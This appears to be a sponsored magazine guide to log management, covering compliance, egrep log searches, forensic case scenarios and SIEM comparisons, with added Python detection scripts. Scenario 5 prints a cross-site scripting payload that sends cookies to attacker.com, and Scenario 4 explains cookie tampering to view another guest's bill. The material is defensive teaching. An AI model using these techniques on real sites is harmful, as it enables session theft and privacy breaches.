log management

Compliance
Analysis
Forensics
SIEM Alternative
Marketplace

Bound to regulations? Then you’re no stranger to log management, and the importance of analyzing the reams of data your devices produce.

BY INFORMATION SECURITY AND SEARCHSECURITY.COM
SPONSORED BY
Log management

Regulatory compliance hard to get through? Automated tools help you get out of the woods.

Regulations are requiring organizations to collect, store and—perhaps most challenging—review and act on log data, on an unprecedented scale. In the past, your network admins probably plowed through logs to track down device issues, and they helped your incident response teams get to the heart of a suspected breach or other serious issue. PCI, HIPAA, GLBA, SOX and other regs have changed this dramatically. Log management now presents enormous challenges, from the Fortune 500 company to the small retail chain to the regional hospital. Automated log management products (and managed services) can provide considerable relief. Let’s examine log management’s challenges and how these tools can help your organization cut them down to size.

GETTING ABOVE THE TREES

Numerous regulations have required and/or implied log management requirements. A well-defined program, however, will help you meet these requirements across the board. Broadly, there are a number of core requirements you should be prepared to address for all regulations.

Collection and Retention. Depending on the regulation, you’ll typically need to keep logs at least a year, and, in many cases, up to seven years. This means not only logs
from network and security devices like routers, switches, firewalls and IDSes, but databases and applications that are within scope of the regulations that apply to your organization.

Audit Trail. Logging has to be set to an appropriate level, so your admins or security analysts can track who did what to and from which system, and, of course, satisfy auditor questions.

Monitoring. You can’t just collect, store and forget your logs. You will have to monitor them, generally at least daily, and demonstrate to the auditor’s satisfaction that you are actually doing that.

In addition to obvious review of network and security device logs, the overriding theme across regulations is to monitor user activities. Make sure you know who has access to what resources.

“The normal one everyone thinks of is these users who had access to this given information at this time, but there are a whole set of requirements surrounding identity and access management that you can only prove if you have logs available,” said Richard Mackey, vice president, SystemExperts.

Remediation. The spirit of all these regulations is that you are actually doing something about security issues, not just recording them. Your logs should reflect that everything from firewall misconfigurations and antivirus updates to improper user behavior is addressed.

This means laying a foundation of detailed requirements.

“Our requirements dealt way down in weeds,” said Matt White, security engineer, information security and compliance, for a large retailer, which uses SenSage. “We wanted to look at things like time of day access for offshore folks, what select statements were being executed against databases that contained cardholder data, exception reporting based on lists of authorized known users, people who are supposed to have access versus people who aren’t. We wanted to differentiate between service accounts and operating system accounts versus individual users, and audit them separately.”

Integrity/Chain of Custody. You’ll need to demonstrate that the logs, and the information they contain, have not been altered or viewed/compromised by the wrong people.

TALL TIMBER

Log management is not easy and it is not cheap. There are no shortcuts, and expect
to invest man-hours and money in process and policy, infrastructure, implementation and ongoing execution. If you fall short, the auditors will ring you up. There are significant obstacles to deal with, which make log management difficult. These problems multiply with mergers and acquisitions, and new business initiatives, systems, applications.

Logs, logs everywhere. You have two choices. You can collect and review logs on each individual system, or find some way to collect all of them to a central location. Clearly, having a centralized repository offers enormous advantages towards developing an efficient program, but it’s no simple matter. You can set up a syslog server, which will handle a number of logs, but not all. Automating continuous log collection from disparate systems is a formidable challenge.

Systems slowdown. Turning logging up to levels required by regulations and shipping them off will smack your devices and networks with a significant performance hit. Be prepared to invest in infrastructure to meet these demands. Are you prepared to compromise the performance of your firewalls, proxies and production servers?

Format smorgasbord. Many logs are in standard syslog format. That’s the good news. But Windows Events logs are not. Nor are a number of very popular network and security devices and tools, applications and databases. That’s before you even start to consider proprietary applications developed in-house. Imagine building parsers for each format and running regular expressions to query each, or dumping everything into a relational database and running SQL queries to get what you need.

“A real showstopper was all the various log sources we had across the board,” said White. “Everything from operating system logs from Windows, Solaris and Linux to network logs coming from IDS, firewalls and RADIUS. We wanted to do some database logging on Oracle and SQL Server, some HP 3000, IIS, Apache, MS ISA proxy logs—the list goes on and on. It would have become a never-ending development effort.”

Logs by the petabyte. The volume of logs generated by all these systems is staggering. Even a relatively small organization can generate terabytes of data that need to be stored for prolonged periods. And, by the way, you’ll need some reasonable way to retrieve them.

“Managing the volume of data, that was
the biggest problem,” said White. “We have a relatively small IT staff for a large retailer, with a lot of off-shore development.”

Keeping watch. Even if you overcome the collection and storage issues, when will your business, network and security folks find the time to sort through it all and monitor the “good stuff” for relevant events and policy issues?

“Most organizations we see do a good job of capturing information,” said Mackey, “but because of the distribution and the complexity, and the volume of logs, they don’t do a good job at all of reviewing logs.”

Making sense of it all. How do you wade through the volume of log data, multiple formats and disparate systems to draw useful intelligence and actionable information? You may or may not have people who understand both the language and potential issues of a particular system, who can decipher that inscrutable log and figure out something is wrong, but making queries across systems to get a better picture of what’s going on is almost impossible.

Reporting. Individual systems, by the same token, may or may not have robust reporting capabilities that will be useful for internal inquiries and auditors. And, without proper analysis, you can’t generate a lot of useful reports that span systems and applications.

Is it safe? There are a fistful of issues here. You need to secure the log data, which can contain sensitive data. This means you have to consider encryption, which presents its own set of headaches. You should ensure the integrity of the data, both in transit and at rest. Finally, you have to provide appropriate access to the log data while maintaining proper separation of duties. There’s no clean way to do this in a centralized log collection.

Caution: Logs may contain sensitive data, such as credit card numbers. This is typically an application security hole that doesn’t show up until you crank up the logging level.

How much is enough? Determining the appropriate logging level to turn on is problematic for each system and application. If it’s too low, you don’t have enough information. If it’s too high, you add unnecessarily to your already considerable performance and storage burdens.

Can’t we all get along? Coordinating all this is a huge challenge, especially across large, complex, distributed enterprises. “The hardest problem is getting people to work together,” said Mackey, “making sure the
organizations responsible for the applications and the logs are going to allow that data to be shared.”

CLEARING THE WAY

Automated log management tools change the equation.

“Without log management tools, it’s almost impossible to do a good job of meeting regulatory requirements,” said Mackey. While log management products and services aren’t exactly plug-and-play, they address the most pressing obstacles.

Centralization. With built-in collectors, log management products solve the problem of dealing with each system, database and application as an island. Centralizing the logs makes the storage issue easier to tackle, while keeping the logs available for reporting, forensics and auditing. You can manage your storage requirements more easily than adding space to individual systems, and control costs and charge-back to departments and business units.

Normalization/correlation. Log management products understand a wide variety of log formats, and normalize them into a common format and correlate so that you can run queries for information across systems.

Analysis. Once you can centralize logs and run queries across systems and applications, regular monitoring becomes feasible. Analysts and admins can review logs for security, compliance, operational issues, using a central console. These tools have built-in components to facilitate analysis and often include compliance packages that map log data against specific regulatory requirements. They make incident response and forensics far easier. Human beings are still required, however.

“As much as this has been automated, it hasn’t gotten to the point that people don’t have to look at it,” said Mackey. “Log management tools make it possible for someone who understands logging associated with each of these components to look at it and understand it. But they don’t automate the recognition of anything that happens to be important.”

Event management. While they are not security information/event management (SIEM) tools, log management products often have some automated alerting capability, based on known issues and/or user-defined rules. Some organizations will use them as “SIEM light,” if they can’t invest in SIEM. Also, they can sometimes be integrated with SIEM tools from the same or third-party vendors.

Value added. Log management can save time and money beyond compliance or even security. Many organizations review logs to troubleshoot network and other IT issues. If you can cut the time needed to troubleshoot a problem from, say 10 minutes to two, you can show some real ROI.

“There’s a business case justification. If you have the ability to report on different metrics and report with consistency,” said Todd Zambrovitz, Symantec senior product marketing manager. “If you perform duties in a third of the time, or generate information in half the time, you can make a great internal business case.”

“We log for things not PCI-oriented,” said Eric Laszlo, senior manager, information technology, at Redcats USA, a LogRhythm customer. “Network segments that have nothing to do with credit cards or order entry. We utilize it on switches and routers as well as for server infrastructure more for trouble-shooting.”

WATCH YOUR STEP

Log management tools make life easier, but that doesn’t mean they’re always easy. A successful deployment requires careful planning and a thorough understanding of your enterprise. Anticipate a phased implementation and plan for growth.

Get a win. Start with logs that are most critical for compliance and, if possible, areas that your vendor handles particularly well. SystemExperts’ Mackey recommends starting with perimeter devices, for example, to help comply with the PCI requirement to install and configure firewalls and protect cardholder data. However, understand that it’s just the start.

Matt White started with an important customer database application for his retail company, but after months of development on a single project, he would do it differently if he were starting again.

“Our initial approach was to deploy it by application. I would have taken an approach of deploying it by technology across the operating system install base: Windows security event logs, Unix syslog, relatively low effort and quick wins. Once you get the operating systems done, determine your database level reporting requirements across the board and move that up from level to what you need to get to application-level logs.”

Coordinate. “Like all activities within a
corporation, it’s a strange mix of technical versus organizational and the financial you always have to keep in mind,” said Mackey. “Small organizations can make decisions quickly, but large enterprises require time to coordinate activities, from log feeds, access permissions, lines of reporting, allocating storage, and assigning budget.”

Standardize. Choose one product as the standard for your organization and develop consistent policies around it.

Get help. Your organization may not have the expertise, at least for initial deployment. Large consulting firms can help you get started. But, warns Mackey, don’t become addicted to the services.

Assess your needs. Starting with the regulatory requirements, determine what logs you actually need to collect, how often you need to review them, what reports are required and what your auditors will look for. Create a baseline of events you want the system to look for.

Establish what systems house relevant data and get a handle on the log data those systems generate, as well as the network infrastructure that accesses those systems.

Neil Roiter is senior technology editor at Information Security.
It seems every new device, appliance and even desktop software program has the capability to generate logs or text-based data. There are a number of challenges associated with managing the onslaught of log data.

The first is centrally storing and gathering these logs; luckily, there are a number of solutions for this. Logs are usually shipped off to a syslog, log management or SIM system that is centrally located in the network. So the big question is how do you sift through log data and find relevant security information?

Although there are many different open-source and commercial software applications that perform some level of log analysis, one […] to perform fast, advanced searches against large amounts of text data. There are a few variations of regex formats; the most commonly used by scripting languages are called Perl-derivative regular expressions. These include regex formats for .NET framework, Python, Java, JavaScript, and of course, Perl. By using this type of regex in combination with any scripting language or search tool, you can quickly and efficiently parse large amounts of data for meaningful information.

One of the most common log formats we tend to see issues in is Apache, or httpd. These Web logs tend to hide a number of secrets that are vital to find, such as attack attempts, successful attack signatures, and even precursor activities to an impending attack.

We will focus on the use of regex with egrep. Egrep uses a very simple syntax for
[…]

Breaking down our result, on line 57 of the log file, a request was made at 8:44 p.m. on Oct. 10 to our Web server, requesting the Webmin directory. We can also see that the server returned a 404 message, indicating […]

STEP 3: REFINE YOUR SEARCH

It may be of interest to search for other requests by Bob, specifically ones that returned a 200 code, to indicate that he found something. Our command could […]
“200” and that is what we asked for. Using regex can often cause false positives, but using our simple query, we were able to eliminate most of them. Let’s investigate Bob a little further.

STEP 4: FOLLOW THE TRAIL

As a last-ditch effort to track all of Bob’s activities, we can search for all requests that Bob made from his IP address. This requires escaping the periods in the IP address as part of the regex. Escaping is a method of telling a regex engine that instead of using the special meaning for a character, we want to use it as a literal search. Note the command below:

    egrep -n -i "10\.10\.10\.10" access_log

In this case, we are telling egrep to find all instances of 10.10.10.10 in the log file. Our results will look much like this:

    57:10.10.10.10 - bob [10/Oct/2000:20:24:18 -0700] "GET /webmin HTTP/1.0" 404 726
    59:10.10.10.10 - bob [10/Oct/2000:20:24:59 -0700] "GET /admin HTTP/1.0" 404 726
    65:10.10.10.10 - bob [10/Oct/2000:20:25:35 -0700] "GET /login HTTP/1.0" 404 726
    120:10.10.10.10 - [10/Oct/2000:21:14:11 -0700] "GET /index.html HTTP/1.0" 200 2571
    157:10.10.10.10 - [10/Oct/2000:21:50:59 -0700] "GET /parent/directory HTTP/1.0" 404 726
    260:10.10.10.10 - [10/Oct/2000:22:25:15 -0700] "GET /support.htm HTTP/1.0" 200 1056

So now we have a pretty good idea that bob is poking around the site, but hasn’t necessarily violated any laws or crossed any boundaries. But, it’s a good idea to continue to watch for logs containing this information.

EVER ALERT

When looking for more dangerous attack indicators, keep an eye out for the frequency and destination of the request. For example, when monitoring an online banking application, keep a particularly close eye on requests sent to transfers. For example, we may see several of these when someone is trying to view others’ transfer records:

    10.10.10.10 - [10/Oct/2000:x:x:x -0700] "GET /banking/view/transfer.jsp?id=12345 HTTP/1.0" 200 1042
    10.10.10.10 - [10/Oct/2000:x:x:x -0700] "GET /banking/view/transfer.jsp?id=12346 HTTP/1.0" 500 798
    10.10.10.10 - [10/Oct/2000:x:x:x -0700] "GET /banking/view/transfer.jsp?id=12347 HTTP/1.0" 200 1042
    10.10.10.10 - [10/Oct/2000:x:x:x -0700] "GET /banking/view/transfer.jsp?id=12348 HTTP/1.0" 500 798

Here we can see where someone noticed the ID=xxxxx in the URL and tried incrementing the number by one until they found other transfer records. This is a serious breakdown in the security of the Web application and most certainly something you will want to catch when analyzing your logs.

Brad Causey is a senior security analyst, author, and web security engineer. He holds the following certifications: MCP, MCDST, MCSA, MCDBA, MCSE, MCT, CCNA, Security+, Network+, A+, CTT+, IT Project+, C|EH, GBLC, GGSC-0100, CIFI, and CISSP.
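The egrep steps above and the EVER ALERT pattern, carried into one script (an added example, not part of Brad Causey’s article): it parses Apache common-log lines, counts 404 probes per client, and flags a client that walks consecutive transfer ids. The sample log is constructed from the entries quoted above, with made-up timestamps and a second client standing in for the page’s x:x:x placeholders.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access_log, modelled on the egrep output and banking
# entries quoted in the article; timestamps on the banking lines are invented.
ACCESS_LOG = """\
10.10.10.10 - bob [10/Oct/2000:20:24:18 -0700] "GET /webmin HTTP/1.0" 404 726
10.10.10.10 - bob [10/Oct/2000:20:24:59 -0700] "GET /admin HTTP/1.0" 404 726
10.10.10.10 - bob [10/Oct/2000:20:25:35 -0700] "GET /login HTTP/1.0" 404 726
10.10.10.10 - - [10/Oct/2000:21:14:11 -0700] "GET /index.html HTTP/1.0" 200 2571
10.10.10.10 - - [10/Oct/2000:21:50:59 -0700] "GET /parent/directory HTTP/1.0" 404 726
10.10.10.10 - - [10/Oct/2000:22:25:15 -0700] "GET /support.htm HTTP/1.0" 200 1056
10.10.10.10 - - [10/Oct/2000:23:01:02 -0700] "GET /banking/view/transfer.jsp?id=12345 HTTP/1.0" 200 1042
10.10.10.10 - - [10/Oct/2000:23:01:05 -0700] "GET /banking/view/transfer.jsp?id=12346 HTTP/1.0" 500 798
10.10.10.10 - - [10/Oct/2000:23:01:08 -0700] "GET /banking/view/transfer.jsp?id=12347 HTTP/1.0" 200 1042
10.10.10.10 - - [10/Oct/2000:23:01:11 -0700] "GET /banking/view/transfer.jsp?id=12348 HTTP/1.0" 500 798
192.0.2.7 - alice [10/Oct/2000:23:05:40 -0700] "GET /banking/view/transfer.jsp?id=77001 HTTP/1.0" 200 1042
"""

# Apache common log format: client, identd, user, [timestamp], "request", status, bytes.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)


def parse_log(text):
    """Parse every well-formed line into a dict; lines the regex rejects are skipped."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = CLF.match(line)
        if m:
            rec = m.groupdict()
            rec["lineno"] = lineno          # same line numbers egrep -n would print
            rec["status"] = int(rec["status"])
            records.append(rec)
    return records


def probing_clients(records, threshold=3):
    """Clients with at least `threshold` 404s: the 'poking around' pattern of steps 1-4,
    counted per address in one pass instead of eyeballing egrep output."""
    misses = Counter(r["ip"] for r in records if r["status"] == 404)
    return {ip: n for ip, n in misses.items() if n >= threshold}


def id_enumeration(records, path="/banking/view/transfer.jsp", param="id", min_run=3):
    """Flag clients that request `path` with consecutive numeric `param` values,
    the transfer-record walk described under EVER ALERT.
    Returns {ip: (first_id, last_id, run_length)} for each client's longest run."""
    seen = defaultdict(list)
    for r in records:
        url = urlsplit(r["target"])
        if url.path != path:
            continue
        values = parse_qs(url.query).get(param, [])
        if values and values[0].isdigit():
            seen[r["ip"]].append(int(values[0]))
    flagged = {}
    for ip, ids in seen.items():
        best = (ids[0], ids[0], 1)
        start, length = 0, 1
        for i in range(1, len(ids)):
            if ids[i] == ids[i - 1] + 1:   # next id is exactly one higher
                length += 1
            else:
                start, length = i, 1
            if length > best[2]:
                best = (ids[start], ids[i], length)
        if best[2] >= min_run:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    recs = parse_log(ACCESS_LOG)
    print("clients with repeated 404s:", probing_clients(recs))
    print("sequential id walks:", id_enumeration(recs))
```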
Are you enough of a sleuth to conduct a forensics investigation on the reams of data your organization’s logs contain?

You are submerged in a sea of data about your network. Just about everything keeps nanosecond-by-nanosecond log files and records of what is happening across your enterprise. The trouble is being able to find out that particular exploit among your intrusion detectors, firewall analyzers, log parsers and other servers. You know that some vital evidence that your network has been compromised could be buried inside one of these repositories. So where to look? How to get started? Let’s demonstrate some of the sleuthing techniques that you can use and patterns to watch out for.

Ideally, you should try to pare down your logs by a suspected time range, or be looking for particular IP addresses that don’t make sense, or actions that only administrators would perform, such as changes to group policies. Multiple entries, such as for unsuccessful login attempts, are another sign of potential break-ins. It is also useful to employ commercial log management tools or services, which can help spot patterns and uncover some of these more insidious events.

We asked some experts to share their insight, and actual samples of data breaches. While we can’t reproduce everything for privacy reasons, our examples provide enough of the event trace and log details to give you a good idea of how to go about finding this critical information. These examples are only the tip of the iceberg, just like real log analysis. Commercial tools can help spot patterns and correlate events, but it helps to hone your skills by spending some time learning what to look for.
Windows servers produce lots of log data. For this case, we are using SenSage’s log management tool to filter through all the data and find the key events from the night before that have to do with policy settings or groups of user accounts. Here is the telltale entry:

    1192097062 2007-10-11 11:04:25 user.notice slon10p00022.ACME.ac-group.com MSWinEventLog 1 Security 1276931 Thu Oct 11 11:04:22 2007 566 Security msooky_g02 User Success Audit SLON10P00022 Directory Service Access Object Operation: Object Server: DS Operation Type: Object Access Object Type: %{bf967aa5-0de6-11d0-a285-00aa003049e2} Object Name: %{206138e6-cb3e-4f37-abbf-2c9a606145f8} Handle ID: - Primary User Name: SLON10P00022$ Primary Domain: ACME Primary Logon ID: (0x0,0x3E7) Client User Name: clumsy_admin Client Domain: ACME Client Logon ID: (0x0,0xF9EB2193) Accesses: DELETE Properties: DELETE Additional Info: Additional Info2: Access Mask: 0x10000 1276930

In this case, the suspected problem was Active Directory, and the IT staff determined that someone had modified an Organizational Unit the previous night. They found a series of group policy change events, including the one above.

In the Windows environment, the deletion of group policy objects creates an event ID of 566 and it is logged for the policy object, indicating the “Delete” access.

Using this report, this brokerage firm was able to find the actual administrator who made the change that caused the outage. It turned out to be a mistake and not a malicious activity.

Lesson learned: Many organizations limit the number of people who have access to the corporate directory applications, and it is a wise idea to test any changes with a normal user account once they have been posted, to ensure that ordinary operations can continue.

SCENARIO 3: TERMINATED EMPLOYEE GETTING ACCESS

We know that threats from the inside are the most pernicious. In this scenario, we find
out that a terminated employee has gained access to the corporate VPN and is deleting critical data. This scenario isn’t just about missing data, but could also be used to investigate other oddities. You would want to search by employee, by time of day, multiple failed login attempts, or a combination of all three. Look at the captured packets, using RSA’s enVision log analyzer, below.

Somehow, the user DJohnson (see first highlighted text in example, below) managed to authenticate himself to the Cisco VPN (either his account wasn’t terminated when he was, or he managed to socially engineer a help desk employee and gain temporary access). We used enVision’s filtering capability to look for recently unauthorized users, or users who have tried to log in with multiple unsuccessful attempts within a short time period. We can see in this example that he deleted a table (see highlighted text at bottom of example) called “Cashflow,” probably to cover his tracks to avoid discovery of previous wrongdoing.

    "ciscovpn" "IKE/52" "2006-12-26 10:04:27.0" "VPN" "75.69.228.30" "Auth.Successful.Methods" "djohnson" "" "57138 12/26/2006 10:40:17.780 SEV=4 IKE/52 RPT=407 75.69.228.30 Group [RSA] User [djohnson] User (djohnson) authenticated."

    "ciscovpn" "IKE/34" "2006-12-26 10:04:29.0" "VPN" "" "75.69.228.30" "Auth.Successful.Methods" "djohnson" "" "57150 12/26/2006 10:40:19.150 SEV=5 IKE/34 RPT=516 75.69.228.30 Group [RSA] User [djohnson] Received local IP Proxy Subnet data in ID Payload: Address 0.0.0.0, Mask 0.0.0.0, Protocol 0, Port 0"

    "oracle" "CREATE" "2006-12-26 10:13:04.0" "DATABASE" "" "" "User.Activity" "djohnson" "DROP TABLE CASHFLOW" "%ORACLE-1-CREATE: EVENTTIME: \Tue Dec 26 10:13:04 2006 \ VERSION: \Oracle9i Enterprise Edition Release 9.2.0.4.0 \ OS: \SunOS\ SYSTEM: \sun4u\ NODE: \pltdb13m3\ INSTANCE: \PLTUKWO1\ ORACLEPID: \143\ UNIXPID: \23965\ ACTION : \'DROP TABLE CASHFLOW' \ DATABASE USER: \djohnson\ PRIVILEGE : SYSDBA CLIENT USER: djohnson CLIENT TERMINAL: STATUS: 0"

Lesson learned: Make sure you have solid procedures for terminated employees, including training your help desk staff.

SCENARIO 4: HIJACKED USER SESSION

We know the Web is an insecure medium, but exactly how insecure? Here is a simple way to demonstrate how to hijack user session data by looking at the cookies on a user’s hard drive. The scenario is a user examining his hotel bill online.

Typically, once a user authenticates himself for the hotel billing system, the information for his room is stored in a cookie. While you can search for the cookie files on your hard drive, it is easier if you use a built-in proxy server, such as Firebug for Firefox or IE Watch for IE, to observe what cookies are created as you connect to various websites. Here are the contents of part of the cookie file, below.

    GET /nyaa/ui/i18n/en-US/Portal/view_bill.aspx?source=folio HTTP/1.0
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9) Gecko/2008051202 Firefox/3.0
    Cookie: ASP.NET_SessionId=ziaifh45ucmljv45rsreafzt; DMBINET=SESSIONID=128566822773487500; CSS=DMBiNet_HIL.css; IMG=Hotel.jpg; MENUIMG=&ADVERTIMG=&FOOTERIMG=&HOTELURL=http://www.blank.com&CORPORATEURL=http://www.blank.com&PURCHASEIMG=Purchase_bkg_.jpg; VlanID=483939474839028.412.593839; COUNTRY=US; LOCATIONID=LOC009; LOCATIONNAME=Com; LOCATIONTYPE=GuestRoom; MACADDRESS=0065F2D421EE; ACCOUNTNO=96113005; ROOMNO=412; MIM_IP=127.0.0.1; MIM_PORT=7296; PMS_DESCRIPTION=Internet Broadband; HOTELID=NIHKTMCA; HELPEMAIL=thhelp@blank.net;

You’ll note that the cookie contains two elements that refer to room 412 (see highlighted text, p. 21), where the guest stayed. If you change both of these to another room, such as 312, and save that cookie to your hard disk and bring up the hotel billing application, you will be able to view another guest’s bill for that night.

Lesson learned: Sometimes it isn’t just the log files that are insecure. Poorly written Web applications that place some user identities in insecure files are also risky.

SCENARIO 5: CROSS-SITE SCRIPTING OF A WEB SERVER

Cross-site scripting vulnerabilities are all too common; hackers can insert code into the normal operations of Web servers that don’t properly validate their inputs and create all sorts of problems. Take a look at this bit of JavaScript that can be typed into a normal input field of an online dating or social networking site that is expecting the ordinary user to update his or her profile information:

    Document.write ("img src=http://attacker.com" + document.cookie + " width=0>")

(Caleb Sima, chief technologist for application security for HP, discusses this exploit in a video presentation, http://www.calebsima.com/israel-presentation.html.)

This code adds a special payload, so that every time someone views this user’s profile, their information is sent in the background to the attacker. This has the effect of being able to infect everyone who views a particular user profile. Here is what our Web server log file will look like:

    2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0
    2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2

These are the actual cookie IDs of the exploited users; the bold text is special Javascript code that can steal the information that is typed in the browser. We are now able to act as these users, we can even
change their account information or communicate as if we were them.

The ultimate cross-site scripting exploit happened a few years ago with the Samy Myspace worm (described at http://namb.la/popular/tech.html). The hacker managed to infect more than a million users in less than a day.

Lesson learned: Validate those inputs! Cross-site scripting is well known, and the fix is to better educate your application developers to review their code for security vulnerabilities.

SCENARIO 6: ROOT PASSWORD GUESSING

We all can forget a password, but how about a poorly crafted root password? Here is an entry from one log file from log management company LogLogic’s archives:

[…]

This entry is repeated literally thousands of times (see highlighted text, bottom left), and occurs over several days. Then we see the following entry, showing the attacker finally got the correct password:

    Apr 24 15:09:02 support sshd[2396]: Accepted password for root from ::ffff:216.167.115.236 port 17001 ssh2

Lesson learned: Don’t have weak passwords, especially on SSH servers that face the Internet. And just because you have blocked all the relevant ports, you should still look for large numbers of failed login attempts.

David Strom is a freelance writer and professional speaker based in St. Louis. He is the former editor-in-chief of Network Computing magazine and Tom’s Hardware.com.
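Two of the checks these scenarios describe, written out as a script (an added example, not code from the article or from the vendors named in it): a parser for the syslog-forwarded Windows audit entry of Scenario 2 that flags event 566 with DELETE access and names the client user, and, for Scenario 6, a counter that flags an SSH password success from an address with a run of earlier failures. The Windows line reuses the entry printed above; the sshd lines are constructed in OpenSSH’s syslog format and use the documentation address 203.0.113.9, not the page’s.

```python
import re
from collections import Counter

# --- Scenario 2: Windows directory-service audit event (566) received over syslog ---
# The entry from the article, with the tab-separated fields collapsed to spaces as
# the magazine printed them.
WIN_EVENT = (
    "1192097062 2007-10-11 11:04:25 user.notice slon10p00022.ACME.ac-group.com "
    "MSWinEventLog 1 Security 1276931 Thu Oct 11 11:04:22 2007 566 Security "
    "msooky_g02 User Success Audit SLON10P00022 Directory Service Access "
    "Object Operation: Object Server: DS Operation Type: Object Access "
    "Object Type: %{bf967aa5-0de6-11d0-a285-00aa003049e2} "
    "Object Name: %{206138e6-cb3e-4f37-abbf-2c9a606145f8} Handle ID: - "
    "Primary User Name: SLON10P00022$ Primary Domain: ACME Primary Logon ID: (0x0,0x3E7) "
    "Client User Name: clumsy_admin Client Domain: ACME Client Logon ID: (0x0,0xF9EB2193) "
    "Accesses: DELETE Properties: DELETE Additional Info: Additional Info2: "
    "Access Mask: 0x10000 1276930"
)

# Fixed header fields after the MSWinEventLog marker: log name, counter, event time,
# event id, source, account, account type, audit outcome, computer.
WIN_HEADER = re.compile(
    r"MSWinEventLog\s+\d+\s+(?P<log>\S+)\s+\d+\s+"
    r"(?P<when>\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4})\s+(?P<event_id>\d+)\s+"
    r"(?P<source>\S+)\s+(?P<account>\S+)\s+\S+\s+(?P<outcome>Success Audit|Failure Audit)\s+"
    r"(?P<computer>\S+)\s+"
)


def field(line, name):
    """Value after 'Name:' in the free-text description, up to the next 'Some Key:'."""
    m = re.search(re.escape(name) + r":\s*(.*?)(?=\s+[A-Z][\w ]*?:|$)", line)
    return m.group(1).strip() if m else ""


def parse_win_event(line):
    m = WIN_HEADER.search(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["event_id"] = int(ev["event_id"])
    ev["client_user"] = field(line, "Client User Name")
    ev["client_domain"] = field(line, "Client Domain")
    ev["object_name"] = field(line, "Object Name")
    ev["accesses"] = field(line, "Accesses").split()
    return ev


def is_directory_delete(ev):
    """Event 566 carrying DELETE access: the 'Delete' on a directory object the text describes."""
    return ev is not None and ev["event_id"] == 566 and "DELETE" in ev["accesses"]


# --- Scenario 6: repeated failed root logins followed by a success ---
# Constructed sample, modelled on the 'Accepted password' entry quoted above.
SSHD_LOG = "\n".join(
    [f"Apr 24 15:0{i}:02 support sshd[2396]: Failed password for root "
     f"from ::ffff:203.0.113.9 port 17{i:03d} ssh2" for i in range(6)]
    + ["Apr 24 15:08:41 support sshd[2401]: Failed password for alice from 198.51.100.4 port 50210 ssh2",
       "Apr 24 15:08:50 support sshd[2401]: Accepted password for alice from 198.51.100.4 port 50210 ssh2",
       "Apr 24 15:09:02 support sshd[2396]: Accepted password for root from ::ffff:203.0.113.9 port 17001 ssh2"]
)

SSHD = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$"
)


def ssh_guessing(text, threshold=5):
    """Count failed password attempts per source address and flag a later success
    from an address that had already failed at least `threshold` times."""
    failures = Counter()
    hits = []
    for line in text.splitlines():
        m = SSHD.match(line)
        if not m:
            continue
        ip = m["ip"][7:] if m["ip"].startswith("::ffff:") else m["ip"]  # drop IPv4-mapped prefix
        if m["result"] == "Failed":
            failures[ip] += 1
        elif failures[ip] >= threshold:
            hits.append({"time": m["ts"], "ip": ip, "user": m["user"],
                         "failures_before": failures[ip]})
    return dict(failures), hits


if __name__ == "__main__":
    ev = parse_win_event(WIN_EVENT)
    print("directory delete:", is_directory_delete(ev), "by", ev["client_user"], "on", ev["computer"])
    print("ssh guessing:", ssh_guessing(SSHD_LOG))
```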
At a large enterprise, security concerns and regulatory pressures, often from multiple mandates, force you to deal with massive amounts of data from network and security devices, databases, and applications. Often, this is more than your network people, compliance staff and security analysts can deal with efficiently. Smaller organizations have less data, but far less staff—the network admin may also be the security manager. But you may have to be concerned about PCI-DSS or HIPAA or both. Mid-sized companies are 'twixt and 'tween.

At the high end, security information and event management (SIEM) tools have historically addressed companies with complex
use of them. As with other security markets, the appetite for SIEM has increased as regulatory pressures have grown.

Log management is a little different sort of animal. In less demanding times, organizations large and small might dig into their logs as needed or as time allowed for incident response, forensics and network operations. Regulations like PCI-DSS, GLBA, HIPAA and SOX have changed all that, as companies have to retain logs from myriad systems and applications, typically for up to seven years, monitor them frequently (often at least once daily), and, oh, by the way, demonstrate all this to the auditors' satisfaction.

This has been a windfall for log management vendors in what was a peripheral market. Pure-play vendors are raking in revenue they wouldn't have dared hope for a few years ago. SIEM companies were quick to take note of this business opportunity, improving or at least doing a better job of marketing their log management capabilities. In several cases, major SIEM vendors have developed their own separate log management tools, bringing in big bucks from previously untapped markets.

At the same time, leading log management vendors have introduced some sophisticated data analysis and real-time detection capabilities that make them more SIEM-like. One vendor referred to his company's development in this area as "SIM Light" (see "Log Management & SIEM Vendors," p. 29).

THE SAME, BUT DIFFERENT

Here's the dilemma: Which technology is right for your organization? If you've already deployed SIEM, can that handle your log management requirements, or do you need a dedicated tool? If you have neither, which do you buy? Do you need both?

"PCI was the initial driver to search for products in the SIM and log management space, when we started the process at the beginning of 2005," said Matt White, a SenSage customer and security engineer for information security and compliance for a large retailer. "I don't know if it was really clear [to his company] at the time what it was they were looking for, SIM, something for database reporting or log management."

Small wonder there's been confusion. One large SIEM vendor admitted that they were a little slow to recognize the growing demand as reports came back from their sales reps a few years ago that potential customers were asking just for log management. They thought initially their reps needed better training on how to sell their SIEM product. After a few months, they realized something was up.

At their foundations, both log management and SIEM tools apply some similar functions. They need to collect logs from many disparate devices and applications, aggregate them in a central repository and normalize data from sundry different formats so you can run queries across the data.

